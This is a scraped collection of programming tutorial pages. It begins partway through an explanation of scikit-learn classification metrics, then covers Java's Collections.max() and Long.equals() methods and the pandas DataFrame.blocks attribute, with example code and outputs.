precision_scoreprecision_score(actual_y, predicted_y)# scoring parameter: ‘precision’" }, { "code": null, "e": 3734, "s": 3007, "text": "But sometimes knowing the probability of positive prediction out of all positive cases might be more important. Imagine we are predicting whether a food is poisonous or not. 
The precision of a model (a chance of food being poisonous when it is predicted to be) is not as important as predicting food to be poisonous when it is poisonous. Because if the model says it’s poisonous we can simply not eat it, but if it fails to tell us that, we risk eating poisonous food. So we want a model that has a high probability of predicting positive when food is poisonous. This is a case for the recall or sensitivity metric. It’s also called the true positive rate. It represents how sensitive our model is in detecting positive cases." }, { "code": null, "e": 3839, "s": 3734, "text": "from sklearn.metrics import recall_scorerecall_score(actual_y, predicted_y)# scoring parameter: ‘recall’" }, { "code": null, "e": 4406, "s": 3839, "text": "But what if both of these are important? In other words, what should we do when not missing positive cases and not missing negative cases are equally important? Imagine you are predicting a disease that can be cured by a certain treatment. But this treatment can be detrimental to those without the disease. In this case, we need a model that is sensitive to detecting positive cases and equally precise in its detection. That’s when the F1 Score comes into play. F1 Score is the harmonic mean of precision and recall, an average between precision and recall ratios." }, { "code": null, "e": 4499, "s": 4406, "text": "from sklearn.metrics import f1_scoref1_score(actual_y, predicted_y)# scoring parameter: ‘f1’" }, { "code": null, "e": 5203, "s": 4499, "text": "Precision and recall metrics focus on predicting positive cases: saying yes to the question of ‘Is this ___?’. But as we saw earlier there are two different ways a model can be correct: it can say yes when it should say yes, and it can say no when it should say no. Accuracy is a probability of being correct in both of these cases. We can use accuracy when classes are equally balanced. For example, let’s say we want to predict whether a picture is a dog or not. We just want the model to say yes when it’s a dog, and no when it’s not. Saying that it’s a dog when it is a cat does not have any different consequences than saying that it’s not a dog when it is a dog. In this case, we can use accuracy." }, { "code": null, "e": 5314, "s": 5203, "text": "from sklearn.metrics import accuracy_scoreaccuracy_score(actual_y, predicted_y)# scoring parameter: ‘accuracy’" }, { "code": null, "e": 5870, "s": 5314, "text": "Lastly, specificity is a sensitivity of predicting the negative cases (probability of predicting negatives out of all negative cases). In other words, we can use specificity when it’s more important to not miss negative cases than to be wrong. Let’s say you want to know if the water from a well is drinkable or not. You’d rather mark drinkable water not drinkable than to wrongfully mark undrinkable ‘drinkable’. If we swap our positive and negative and ask a question of ‘is this water contagious?’, we would be using sensitivity instead of specificity." }, { "code": null, "e": 6095, "s": 5870, "text": "Specificity does not have a built-in function within the Sci-kit Learn package. Instead, you can either use sensitivity and swap positive and negative cases or calculate it through custom function using the confusion matrix." 
}, { "code": null, "e": 6385, "s": 6095, "text": "# custom function to calculate specificity for binary classificationfrom sklearn.metrics import confusion_matrixdef specificity_score(y_true, y_predicted): cm = confusion_matrix(y_true, y_predicted) return cm[0, 0] / (cm[0, 0] + cm[0, 1])print(specificity_score(y_true, y_predicted))" }, { "code": null, "e": 6714, "s": 6385, "text": "We reviewed how to choose evaluation metrics for our binary classification data. But what do we do when our target is not yes or no but comprised of multiple categories? One way is to count each outcome globally regardless of within-class distribution and calculate the metric. We can accomplish this by using the micro average." }, { "code": null, "e": 7216, "s": 6714, "text": "Let’s think about what it means to use global counts. If we just look at the global outcome, we don’t have the four outcomes as before (TP, TN, FP, FN). Instead we have cases that are true (prediction = actual class) or false (prediction != actual class). Therefore, the micro precision, micro recall, and accuracy all represent the probability of accurate prediction and are equal. Also since the F1 Score is the harmonic mean of precision and recall, the micro F1 Score is the same as other metrics." }, { "code": null, "e": 7505, "s": 7216, "text": "# these are all the samerecall_score(actual_y, predicted_y, average = 'micro')precision_score(actual_y, predicted_y, average = 'micro')accuracy_score(actual_y, predicted_y)f1_score(actual_y, predicted_y, average = 'micro')# scoring parameter: 'f1_micro', 'recall_micro', 'precision_micro'" }, { "code": null, "e": 7913, "s": 7505, "text": "Counting global outcomes disregards the distribution of predictions within each class (it just counts how many got it right). This can be helpful when the dataset has classes that are highly imbalanced and when we do not care about controlling prediction errors in any specific class. But as we discussed above, many of our problems do involve having specific control over where prediction errors come from." }, { "code": null, "e": 8362, "s": 7913, "text": "Another method to deal with multi-class is to simply calculate the binary measures for each class. For example, if our target variable can be either cat, dog, or bird, we get a binary yes or no answer for each prediction. Is this a cat? Is this a dog? Is this a bird? This will lead to as many scores as a number of our target classes. Then we can aggregate these scores and turn them into a single metric using a macro average or weighted average." }, { "code": null, "e": 8964, "s": 8362, "text": "Macro average calculates metrics for individual class then computes the average of them. This means that it gives equal weight to the results returned from each class regardless of their overall size. So it is not sensitive to the size of each class, but it takes the performance of individual class more seriously even when it’s a minority. Therefore, the macro average is a good measure if predicting minority class well is as important as the overall accuracy and we also believe that there is a reliable amount of information in the minority class to represent the ground truth pattern accurately." }, { "code": null, "e": 9057, "s": 8964, "text": "The macro average recall score is the same as the balanced accuracy in multi-class problems." 
}, { "code": null, "e": 9447, "s": 9057, "text": "print(f1_score(actual_y, predicted_y, average = 'macro'))print(precision_score(actual_y, predicted_y, average = 'macro'))# below two are the same measuresfrom sklearn.metrics import balanced_accuracy_score, recall_scoreprint(recall_score(actual_y, predicted_y, average = 'macro'))print(balanced_accuracy_score(actual_y, predicted_y))# scoring parameter: 'f1_macro', 'recall_macro', ...etc." }, { "code": null, "e": 9909, "s": 9447, "text": "To recap, the micro average gives equal weight to individual observations, and the macro average gives equal weight to individual classes. The macro average by definition does not care about how much data each class has. So even when the minority class does not have enough data to show a reliable pattern, it will still weigh the minority class equally. If this is the case, we might want to consider the overall size of each class by using a weighted average." }, { "code": null, "e": 10171, "s": 9909, "text": "# we can also compute precision, recall, and f1 at the same timefrom sklearn.metrics import precision_recall_fscore_supportprecision_recall_fscore_support(actual_y, predicted_y, average = 'weighted')# scoring parameter: 'f1_weighted', 'recall_weighted', ...etc." }, { "code": null, "e": 10765, "s": 10171, "text": "Each of the metrics we discussed so far individually tells a part of a story, and that was why we wanted to make sure our goal is clear and aligns with the metric we choose. But what if we just want a measure that can holistically tell us how our model classification is doing relative to a random chance? Cohen’s Kappa compares the classifier’s performance to that of a random classifier. Naturally, it takes the class imbalance into account as the random classifier will rely on the distribution of each class. Unlike other measures that are probabilities, Cohen’s Kappa ranges from -1 to 1." }, { "code": null, "e": 10858, "s": 10765, "text": "from sklearn.metrics import cohen_kappa_scoreprint(cohen_kappa_score(actual_y, predicted_y))" } ]
Collections max() method in Java with Examples - GeeksforGeeks
11 May, 2021 The max() method of java.util.Collections class is used to return the maximum element of the given collection, according to the natural ordering of its elements. All elements in the collection must implement the Comparable interface. Furthermore, all elements in the collection must be mutually comparable (that is, e1.compareTo(e2) must not throw a ClassCastException for any elements e1 and e2 in the collection).This method iterates over the entire collection, hence it requires time proportional to the size of the collection. Syntax: public static <T extends Object & Comparable> T max(Collection coll) Parameters: This method takes the collection coll as a parameter whose maximum element is to be determined.Return Value: This method returns the maximum element of the given collection, according to the natural ordering of its elements. Exception: This method throws following Exception: ClassCastException – if the collection contains elements that are not mutually comparable (for example, strings and integers). NoSuchElementException – if the collection is empty Below are the examples to illustrate the max() method Example 1: Java // Java program to demonstrate// max() method for Integer value import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // Adding element to Vector v list.add(-1); list.add(4); list.add(-5); list.add(1); // printing the max value // using max() method System.out.println("Max value is: " + Collections.max(list)); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Max value is: 4 Example 2: for ClassCastException Java // Java program to demonstrate// max() method for ClassCastException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<String> list = new LinkedList<String>(); // creating variable of object type Object i = Integer.valueOf(42); // Adding element to Vector v list.add("Hello"); list.add((String)i); // printing the max value // using max() method System.out.println("Max value is: " + Collections.max(list)); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Exception thrown : java.lang.ClassCastException: java.lang.Integer cannot be cast to java.lang.String Example 3: for NoSuchElementException Java // Java program to demonstrate// max() method for NoSuchElementException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // printing the max value // using max() method System.out.println("Trying to get " + "the max from empty list"); System.out.println("Max value is: " + Collections.max(list)); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Trying to get the max from empty list Exception thrown : java.util.NoSuchElementException The max() method of java.util.Collections class is used to return the maximum element of the given collection, according to the order induced by the specified comparator. 
All elements in the collection must be mutually comparable by the specified comparator (that is, comp.compare(e1, e2) must not throw a ClassCastException for any elements e1 and e2 in the collection).This method iterates over the entire collection, hence it requires time proportional to the size of the collection. Parameters: This method takes the following argument as a parameter coll – the collection whose maximum element is to be determined. comp – the comparator with which to determine the maximum element. A null value indicates that the elements’ natural ordering should be used. Return Value: This method returns the maximum element of the given collection, according to the specified comparator. Exception: This method throws following Exception: ClassCastException – if the collection contains elements that are not mutually comparable (for example, strings and integers). NoSuchElementException – if the collection is empty Below are the examples to illustrate the max() method Example 1: Java // Java program to demonstrate// max() method for Integer value import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // Adding element to Vector v list.add(-1); list.add(4); list.add(-5); list.add(1); // printing the max value // using max() method System.out.println("Max val: " + Collections.max(list, Collections.reverseOrder())); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Max val: -5 Example 2: for ClassCastException Java // Java program to demonstrate// max() method for ClassCastException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<String> list = new LinkedList<String>(); // creating variable of object type Object i = Integer.valueOf(42); // Adding element to Vector v list.add("Hello"); list.add((String)i); // printing the max value // using max() method System.out.println("Max val: " + Collections .max(list, Collections .reverseOrder())); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Exception thrown : java.lang.ClassCastException: java.lang.Integer cannot be cast to java.lang.String Example 3: for NoSuchElementException Java // Java program to demonstrate// max() method for NoSuchElementException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // printing the max value // using max() method System.out.println("Trying to get " + "the max from empty list"); System.out.println("Max val: " + Collections .max(list, Collections .reverseOrder())); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Trying to get the max from empty list Exception thrown : java.util.NoSuchElementException Akanksha_Rai sweetyty Java - util package Java-Collections Java-Functions Java Java Java-Collections Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. 
[ { "code": null, "e": 24500, "s": 24472, "text": "\n11 May, 2021" }, { "code": null, "e": 25031, "s": 24500, "text": "The max() method of java.util.Collections class is used to return the maximum element of the given collection, according to the natural ordering of its elements. All elements in the collection must implement the Comparable interface. Furthermore, all elements in the collection must be mutually comparable (that is, e1.compareTo(e2) must not throw a ClassCastException for any elements e1 and e2 in the collection).This method iterates over the entire collection, hence it requires time proportional to the size of the collection." }, { "code": null, "e": 25040, "s": 25031, "text": "Syntax: " }, { "code": null, "e": 25111, "s": 25040, "text": "public static <T extends Object & Comparable> T\n max(Collection coll)" }, { "code": null, "e": 25348, "s": 25111, "text": "Parameters: This method takes the collection coll as a parameter whose maximum element is to be determined.Return Value: This method returns the maximum element of the given collection, according to the natural ordering of its elements." }, { "code": null, "e": 25401, "s": 25348, "text": "Exception: This method throws following Exception: " }, { "code": null, "e": 25528, "s": 25401, "text": "ClassCastException – if the collection contains elements that are not mutually comparable (for example, strings and integers)." }, { "code": null, "e": 25580, "s": 25528, "text": "NoSuchElementException – if the collection is empty" }, { "code": null, "e": 25634, "s": 25580, "text": "Below are the examples to illustrate the max() method" }, { "code": null, "e": 25647, "s": 25634, "text": "Example 1: " }, { "code": null, "e": 25652, "s": 25647, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for Integer value import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // Adding element to Vector v list.add(-1); list.add(4); list.add(-5); list.add(1); // printing the max value // using max() method System.out.println(\"Max value is: \" + Collections.max(list)); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 26490, "s": 25652, "text": null }, { "code": null, "e": 26506, "s": 26490, "text": "Max value is: 4" }, { "code": null, "e": 26543, "s": 26508, "text": "Example 2: for ClassCastException " }, { "code": null, "e": 26548, "s": 26543, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for ClassCastException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<String> list = new LinkedList<String>(); // creating variable of object type Object i = Integer.valueOf(42); // Adding element to Vector v list.add(\"Hello\"); list.add((String)i); // printing the max value // using max() method System.out.println(\"Max value is: \" + Collections.max(list)); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 27444, "s": 26548, "text": null }, { "code": null, "e": 27546, "s": 27444, "text": "Exception thrown : java.lang.ClassCastException: java.lang.Integer cannot be cast to java.lang.String" }, { "code": null, "e": 27587, "s": 
27548, "text": "Example 3: for NoSuchElementException " }, { "code": null, "e": 27592, "s": 27587, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for NoSuchElementException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // printing the max value // using max() method System.out.println(\"Trying to get \" + \"the max from empty list\"); System.out.println(\"Max value is: \" + Collections.max(list)); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 28406, "s": 27592, "text": null }, { "code": null, "e": 28496, "s": 28406, "text": "Trying to get the max from empty list\nException thrown : java.util.NoSuchElementException" }, { "code": null, "e": 28985, "s": 28498, "text": "The max() method of java.util.Collections class is used to return the maximum element of the given collection, according to the order induced by the specified comparator. All elements in the collection must be mutually comparable by the specified comparator (that is, comp.compare(e1, e2) must not throw a ClassCastException for any elements e1 and e2 in the collection).This method iterates over the entire collection, hence it requires time proportional to the size of the collection." }, { "code": null, "e": 29054, "s": 28985, "text": "Parameters: This method takes the following argument as a parameter " }, { "code": null, "e": 29119, "s": 29054, "text": "coll – the collection whose maximum element is to be determined." }, { "code": null, "e": 29261, "s": 29119, "text": "comp – the comparator with which to determine the maximum element. A null value indicates that the elements’ natural ordering should be used." }, { "code": null, "e": 29379, "s": 29261, "text": "Return Value: This method returns the maximum element of the given collection, according to the specified comparator." }, { "code": null, "e": 29432, "s": 29379, "text": "Exception: This method throws following Exception: " }, { "code": null, "e": 29559, "s": 29432, "text": "ClassCastException – if the collection contains elements that are not mutually comparable (for example, strings and integers)." 
}, { "code": null, "e": 29611, "s": 29559, "text": "NoSuchElementException – if the collection is empty" }, { "code": null, "e": 29665, "s": 29611, "text": "Below are the examples to illustrate the max() method" }, { "code": null, "e": 29678, "s": 29665, "text": "Example 1: " }, { "code": null, "e": 29683, "s": 29678, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for Integer value import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // Adding element to Vector v list.add(-1); list.add(4); list.add(-5); list.add(1); // printing the max value // using max() method System.out.println(\"Max val: \" + Collections.max(list, Collections.reverseOrder())); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 30592, "s": 29683, "text": null }, { "code": null, "e": 30604, "s": 30592, "text": "Max val: -5" }, { "code": null, "e": 30641, "s": 30606, "text": "Example 2: for ClassCastException " }, { "code": null, "e": 30646, "s": 30641, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for ClassCastException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<String> list = new LinkedList<String>(); // creating variable of object type Object i = Integer.valueOf(42); // Adding element to Vector v list.add(\"Hello\"); list.add((String)i); // printing the max value // using max() method System.out.println(\"Max val: \" + Collections .max(list, Collections .reverseOrder())); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 31689, "s": 30646, "text": null }, { "code": null, "e": 31791, "s": 31689, "text": "Exception thrown : java.lang.ClassCastException: java.lang.Integer cannot be cast to java.lang.String" }, { "code": null, "e": 31832, "s": 31793, "text": "Example 3: for NoSuchElementException " }, { "code": null, "e": 31837, "s": 31832, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for NoSuchElementException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // printing the max value // using max() method System.out.println(\"Trying to get \" + \"the max from empty list\"); System.out.println(\"Max val: \" + Collections .max(list, Collections .reverseOrder())); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 32798, "s": 31837, "text": null }, { "code": null, "e": 32888, "s": 32798, "text": "Trying to get the max from empty list\nException thrown : java.util.NoSuchElementException" }, { "code": null, "e": 32903, "s": 32890, "text": "Akanksha_Rai" }, { "code": null, "e": 32912, "s": 32903, "text": "sweetyty" }, { "code": null, "e": 32932, "s": 32912, "text": "Java - util package" }, { "code": null, "e": 32949, "s": 32932, "text": "Java-Collections" }, { "code": null, "e": 32964, "s": 32949, "text": "Java-Functions" }, { "code": null, "e": 32969, "s": 32964, "text": "Java" }, { "code": null, 
"e": 32974, "s": 32969, "text": "Java" }, { "code": null, "e": 32991, "s": 32974, "text": "Java-Collections" }, { "code": null, "e": 33089, "s": 32991, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 33121, "s": 33089, "text": "Initialize an ArrayList in Java" }, { "code": null, "e": 33172, "s": 33121, "text": "Object Oriented Programming (OOPs) Concept in Java" }, { "code": null, "e": 33202, "s": 33172, "text": "HashMap in Java with Examples" }, { "code": null, "e": 33221, "s": 33202, "text": "Interfaces in Java" }, { "code": null, "e": 33252, "s": 33221, "text": "How to iterate any Map in Java" }, { "code": null, "e": 33270, "s": 33252, "text": "ArrayList in Java" }, { "code": null, "e": 33302, "s": 33270, "text": "Multidimensional Arrays in Java" }, { "code": null, "e": 33317, "s": 33302, "text": "Stream In Java" }, { "code": null, "e": 33337, "s": 33317, "text": "Stack Class in Java" } ]
Python | Pandas DataFrame.blocks
20 Feb, 2019 Pandas DataFrame is a two-dimensional size-mutable, potentially heterogeneous tabular data structure with labeled axes (rows and columns). Arithmetic operations align on both row and column labels. It can be thought of as a dict-like container for Series objects. This is the primary data structure of Pandas. The Pandas DataFrame.blocks attribute is a synonym for the as_blocks() function. It converts the frame to a dict of dtype -> constructor type, where each block holds columns of a single, homogeneous dtype. Syntax: DataFrame.blocks Parameter : None Returns : dict Example #1: Use the DataFrame.blocks attribute to return a dictionary containing the data in blocks of separate data types. # importing pandas as pdimport pandas as pd # Creating the DataFramedf = pd.DataFrame({'Weight':[45, 88, 56, 15, 71], 'Name':['Sam', 'Andrea', 'Alex', 'Robin', 'Kia'], 'Age':[14, 25, 55, 8, 21]}) # Create the indexindex_ = ['Row_1', 'Row_2', 'Row_3', 'Row_4', 'Row_5'] # Set the indexdf.index = index_ # Print the DataFrameprint(df) Output : Now we will use the DataFrame.blocks attribute to return the block representation of the given dataframe. # return a dictionaryresult = df.blocks # Print the resultprint(result) Output : As we can see in the output, the DataFrame.blocks attribute has successfully returned a dictionary containing the data of the dataframe. Homogeneous columns are placed in the same block. Example #2: Use the DataFrame.blocks attribute to return a dictionary containing the data in blocks of separate data types. # importing pandas as pdimport pandas as pd # Creating the DataFramedf = pd.DataFrame({"A":[12, 4, 5, None, 1], "B":[7, 2, 54, 3, None], "C":[20, 16, 11, 3, 8], "D":[14, 3, None, 2, 6]}) # Create the indexindex_ = ['Row_1', 'Row_2', 'Row_3', 'Row_4', 'Row_5'] # Set the indexdf.index = index_ # Print the DataFrameprint(df) Output : Now we will use the DataFrame.blocks attribute to return the block representation of the given dataframe. # return a dictionaryresult = df.blocks # Print the resultprint(result) Output : As we can see in the output, the DataFrame.blocks attribute has successfully returned a dictionary containing the data of the dataframe. Homogeneous columns are placed in the same block.
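Note that this attribute comes from older pandas: both blocks and as_blocks() were deprecated and later removed (they are gone in pandas 1.0+), so the examples above only run on an old install. On a modern version, a rough do-it-yourself equivalent - a sketch, not the original API - is to group the columns by dtype:

import pandas as pd

df = pd.DataFrame({'Weight': [45, 88, 56, 15, 71],
                   'Name': ['Sam', 'Andrea', 'Alex', 'Robin', 'Kia'],
                   'Age': [14, 25, 55, 8, 21]})

# build a dict of dtype name -> sub-frame holding only the columns of that dtype,
# similar in spirit to the old block layout
blocks = {str(dtype): df.select_dtypes(include=[str(dtype)])
          for dtype in df.dtypes.unique()}

for dtype, frame in blocks.items():
    print(dtype)
    print(frame)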
[ { "code": null, "e": 28, "s": 0, "text": "\n20 Feb, 2019" }, { "code": null, "e": 342, "s": 28, "text": "Pandas DataFrame is a two-dimensional size-mutable, potentially heterogeneous tabular data structure with labeled axes (rows and columns). Arithmetic operations align on both row and column labels. It can be thought of as a dict-like container for Series objects. This is the primary data structure of the Pandas." }, { "code": null, "e": 519, "s": 342, "text": "Pandas DataFrame.blocks attribute is synonym for as_blocks() function. It basically convert the frame to a dict of dtype -> Constructor Types that each has a homogeneous dtype." }, { "code": null, "e": 544, "s": 519, "text": "Syntax: DataFrame.blocks" }, { "code": null, "e": 561, "s": 544, "text": "Parameter : None" }, { "code": null, "e": 576, "s": 561, "text": "Returns : dict" }, { "code": null, "e": 696, "s": 576, "text": "Example #1: Use DataFrame.blocks attribute to return a dictionary containing the data in blocks of separate data types." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the DataFramedf = pd.DataFrame({'Weight':[45, 88, 56, 15, 71], 'Name':['Sam', 'Andrea', 'Alex', 'Robin', 'Kia'], 'Age':[14, 25, 55, 8, 21]}) # Create the indexindex_ = ['Row_1', 'Row_2', 'Row_3', 'Row_4', 'Row_5'] # Set the indexdf.index = index_ # Print the DataFrameprint(df)", "e": 1069, "s": 696, "text": null }, { "code": null, "e": 1078, "s": 1069, "text": "Output :" }, { "code": null, "e": 1180, "s": 1078, "text": "Now we will use DataFrame.blocks attribute to return the block representation of the given dataframe." }, { "code": "# return a dictionaryresult = df.blocks # Print the resultprint(result)", "e": 1253, "s": 1180, "text": null }, { "code": null, "e": 1262, "s": 1253, "text": "Output :" }, { "code": null, "e": 1569, "s": 1262, "text": "As we can see in the output, the DataFrame.blocks attribute has successfully returned a dictionary containing the data of the dataframe. Homogeneous columns are places in the same block. Example #2: Use DataFrame.blocks attribute to return a dictionary containing the data in blocks of separate data types." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the DataFramedf = pd.DataFrame({\"A\":[12, 4, 5, None, 1], \"B\":[7, 2, 54, 3, None], \"C\":[20, 16, 11, 3, 8], \"D\":[14, 3, None, 2, 6]}) # Create the indexindex_ = ['Row_1', 'Row_2', 'Row_3', 'Row_4', 'Row_5'] # Set the indexdf.index = index_ # Print the DataFrameprint(df)", "e": 1955, "s": 1569, "text": null }, { "code": null, "e": 1964, "s": 1955, "text": "Output :" }, { "code": null, "e": 2066, "s": 1964, "text": "Now we will use DataFrame.blocks attribute to return the block representation of the given dataframe." }, { "code": "# return a dictionaryresult = df.blocks # Print the resultprint(result)", "e": 2139, "s": 2066, "text": null }, { "code": null, "e": 2148, "s": 2139, "text": "Output :" }, { "code": null, "e": 2335, "s": 2148, "text": "As we can see in the output, the DataFrame.blocks attribute has successfully returned a dictionary containing the data of the dataframe. Homogeneous columns are places in the same block." 
}, { "code": null, "e": 2359, "s": 2335, "text": "Python pandas-dataFrame" }, { "code": null, "e": 2391, "s": 2359, "text": "Python pandas-dataFrame-methods" }, { "code": null, "e": 2405, "s": 2391, "text": "Python-pandas" }, { "code": null, "e": 2412, "s": 2405, "text": "Python" }, { "code": null, "e": 2510, "s": 2412, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 2542, "s": 2510, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 2569, "s": 2542, "text": "Python Classes and Objects" }, { "code": null, "e": 2600, "s": 2569, "text": "Python | os.path.join() method" }, { "code": null, "e": 2623, "s": 2600, "text": "Introduction To PYTHON" }, { "code": null, "e": 2644, "s": 2623, "text": "Python OOPs Concepts" }, { "code": null, "e": 2700, "s": 2644, "text": "How to drop one or multiple columns in Pandas Dataframe" }, { "code": null, "e": 2742, "s": 2700, "text": "How To Convert Python Dictionary To JSON?" }, { "code": null, "e": 2784, "s": 2742, "text": "Check if element exists in list in Python" }, { "code": null, "e": 2823, "s": 2784, "text": "Python | Get unique values from a list" } ]
Java Long equals() method with Examples
05 Dec, 2018 The java.lang.Long.equals() method is a built-in function in Java that compares this object to the specified object. The result is true if and only if the argument is not null and is a Long object that contains the same long value as this object. It returns false otherwise. When an ordering between two values is needed, the compareTo() method should be preferred. Syntax: public boolean equals(Object obj) Parameter: obj - the object that this Long is to be compared with. Returns: The function returns a boolean value after comparing with the object passed in the parameter. It returns true if and only if the argument is not null and is a Long object that contains the same long value as this object. It returns false otherwise. Program 1: The program below demonstrates the working of the method. // Java program to demonstrate// the java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { public static void main(String args[]) { // when two objects are different Long obj1 = new Long(123123); Long obj2 = new Long(164165); System.out.print("Object1 & Object2: "); if (obj1.equals(obj2)) System.out.println("Equal"); else System.out.println("Not equal"); // when two objects are equal obj1 = new Long(12345); obj2 = new Long(12345); System.out.print("Object1 & Object2: "); if (obj1.equals(obj2)) System.out.print("Equal"); else System.out.print("Not Equal"); }} Output: Object1 & Object2: Not equal Object1 & Object2: Equal Program 2: The program below demonstrates what happens when no argument is passed (it does not compile). // Java program to demonstrate// the java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { // driver code public static void main(String args[]) { // when no argument is passed Long obj1 = new Long(124); Long obj2 = new Long(167); System.out.print("Object1 & Object2: "); if (obj1.equals()) System.out.println("Equal"); else System.out.println("Not Equal"); }} Output: prog.java:15: error: no suitable method found for equals(no arguments) if(obj1.equals()) ^ method Object.equals(Object) is not applicable (actual and formal argument lists differ in length) method Long.equals(Object) is not applicable (actual and formal argument lists differ in length) 1 error Program 3: The program below demonstrates the result when an object of a different type is passed as the argument. // Java program to demonstrate// the java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { // driver code public static void main(String args[]) { // when an object of a different type is passed Long obj1 = new Long(124); System.out.print("Object1 & Object2: "); if (obj1.equals("gfg")) System.out.println("Equal"); else System.out.println("Not Equal"); }} Output: Object1 & Object2: Not Equal
[ { "code": null, "e": 28, "s": 0, "text": "\n05 Dec, 2018" }, { "code": null, "e": 377, "s": 28, "text": "The java.lang.Long.equals() is a built-in function in java that compares this object to the specified object. The result is true if and only if the argument is not null and is a Long object that contains the same long value as this object. It returns false if both the objects are not same. In all other cases, compareTo method should be preferred." }, { "code": null, "e": 385, "s": 377, "text": "Syntax:" }, { "code": null, "e": 503, "s": 385, "text": "public boolean equals(Object obj) \n\nParameter: \nobj - The passed object is the object that is to be compared with. \n" }, { "code": null, "e": 777, "s": 503, "text": "Returns:The function returns a boolean value after comparing with the object passed in the parameter. It returns true if and only if the argument is not null and is a Long object that contains the same long value as this object. It returns false if the object are not same." }, { "code": null, "e": 844, "s": 777, "text": "Program 1: The program below demonstrates the working of function." }, { "code": "// Java program to demonstrate// of java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { public static void main(String args[]) { // when two objects are different Long obj1 = new Long(123123); Long obj2 = new Long(164165); System.out.print(\"Object1 & Object2: \"); if (obj1.equals(obj2)) System.out.println(\"Equal\"); else System.out.println(\"Not equal\"); // when two objects are equal obj1 = new Long(12345); obj2 = new Long(12345); System.out.print(\"Object1 & Object2: \"); if (obj1.equals(obj2)) System.out.print(\"Equal\"); else System.out.print(\"Not Equal\"); }}", "e": 1564, "s": 844, "text": null }, { "code": null, "e": 1572, "s": 1564, "text": "Output:" }, { "code": null, "e": 1637, "s": 1572, "text": "object1 and object2 are not equal\nobject1 and object2 are equal\n" }, { "code": null, "e": 1730, "s": 1637, "text": "Program 2: The program below demonstrates the working of function when no argument is passed" }, { "code": "// Java program to demonstrate// of java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { // driver code public static void main(String args[]) { // when no argument is passed Long obj1 = new Long(124); Long obj2 = new Long(167); System.out.print(\"Object1 & Object2: \"); if (obj1.equals()) System.out.println(\"Equal\"); else System.out.println(\"Not Equal\"); }}", "e": 2183, "s": 1730, "text": null }, { "code": null, "e": 2191, "s": 2183, "text": "Output:" }, { "code": null, "e": 2526, "s": 2191, "text": "prog.java:15: error: no suitable method found for equals(no arguments)\n if(obj1.equals())\n ^\n method Object.equals(Object) is not applicable\n (actual and formal argument lists differ in length)\n method Long.equals(Object) is not applicable\n (actual and formal argument lists differ in length)\n1 error\n" }, { "code": null, "e": 2653, "s": 2526, "text": "Program 3: The program below demonstrates the working of function when anything other than the object is passed in an argument" }, { "code": "// Java program to demonstrate// of java.lang.Long.equals() methodimport 